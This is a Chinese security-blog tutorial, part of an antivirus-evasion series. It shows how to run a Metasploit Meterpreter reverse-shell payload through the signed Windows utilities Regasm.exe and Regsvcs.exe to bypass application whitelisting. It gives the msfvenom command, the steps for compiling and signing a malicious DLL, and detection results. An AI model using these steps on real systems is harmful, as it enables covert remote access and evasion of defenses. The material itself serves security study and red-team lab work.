"/>
·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
DZ插件网 门户 网站安全 查看内容

远控免杀专题(42)-白名单Regasm.exe/Regsvcs.exe执行payload

2022-7-22 08:31| 发布者: admin| 查看: 246| 评论: 0|原作者: 白帽子

摘要: 了解如何通过白名单管理(Regasm.exe/Regsvcs.exe)进行远程操作的免杀技术,保护系统免受恶意payload攻击。探索安全的程序执行验证方法,提升网络环境下的防病毒能力。掌握远程控制工具的使用,确保数据传输与操作的安全。保护你的系统,远离潜在威胁,提升网络安全防护。

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!


文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus

免杀能力一览表

几点说明:

1、表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为杀软查杀能力或免杀能力的判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

6、由于白名单程序加载payload的免杀测试需要杀软的行为检测才合理,静态查杀payload或者查杀白名单程序都没有任何意义,所以这里对白名单程序的免杀效果不做评判。


一、Regasm.exe/Regsvcs.exe简介

Regsvcs和Regasm是Windows命令行实用程序,用于注册.NET组件对象模型(COM)程序集。两者都是由Microsoft进行数字签名的。攻击者可以使用Regsvcs和Regasm代理通过受信任的Windows实用程序执行代码。两个实用程序可用于通过使用二进制内的属性来绕过进程白名单,以指定应在注册或取消注册之前运行的代码:[ComRegisterFunction]或[ComUnregisterFunction]分别。即使进程在权限不足的情况下运行并且无法执行,也将执行具有注册和取消注册属性的代码。

由于白名单加载payload的免杀测试需要结合杀软的行为检测才合理,查杀白名单文件都没有任何意义,payload文件的查杀率依赖于对payload的免杀处理,所以这里对白名单程序的免杀效果不做评判。

二、使用Regasm.exe/Regsvcs.exe执行Payload

攻击机:Kali 192.168.19.128

受害机:Win7 192.168.19.130

使用工具:Metasploit

依赖环境:Microsoft.NET Framework v4.0.30319、Microsoft SDKs

1、首先下载用以生成恶意dll的cs文件

https://github.com/3gstudent/Bypass-McAfee-Application-Control–Code-Execution/blob/master/regsvcs.cs

2、在攻击机上使用msfvenom生成C#格式的payload

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=4444 -f csharp

3、将regsvcs.cs(下载的regsvcs.cs为执行calc.exe程序的cs文件)中的shellcode替换成为在攻击机上使用msfvenom生成C#格式的payload

4、生成dll文件

利用C:\Windows\Microsoft.NET\Framework\v4.0.30319文件夹中的csc.exe程序可以将cs文件生成为dll文件。

编译dll,注意文件的路径:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs


regsvcs.exe加载或卸载指定dll时该dll必须签名才可执行成功,因此命令中使用的key.snk文件为dll签名文件,是由sn.exe生成的公钥和私钥对,如果没有sn命令你可能需要安装vs或者Microsoft SDKs。

5、配置攻击机的Msf

6、使用Regasm.exe/Regsvcs.exe执行恶意dll文件

(1)利用Regsvcs.exe执行dll文件



可见Msf已上线

(2)利用Regasm.exe执行dll文件

Msf也可以上线

三、小结

生成的dll文件分别使用360安全卫士、360杀毒、火绒杀毒进行检测,均未发现任何风险。

但使用Regasm.exe/Regsvcs.exe执行恶意dll文件时,360安全卫士会根据行为进行报警。

利用VT进行查杀,查杀率为31/69。

四、参考资料

攻击复现 —— 利用Regasm.exe与Regsvcs.exe绕过AppLocker:https://www.freebuf.com/column/217229.html

渗透测试中弹shell的多种方式及bypass:https://xz.aliyun.com/t/5768#toc-12




E


N


D





guān


zhù



men



Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:







上一篇:【代码审计】PHP代码审计之CTF系列(1)
下一篇:【代码审计】PHP代码审计之CTF系列(2)

鲜花

握手

雷人

路过

鸡蛋

评论

您需要登录后才可以发表言论 登录立即注册
创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:18.116.24.238,GMT+8, 2024-12-26 10:44 , Processed in 0.273345 second(s), 47 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯
扫一扫添加微信客服
QQ客服返回顶部
返回顶部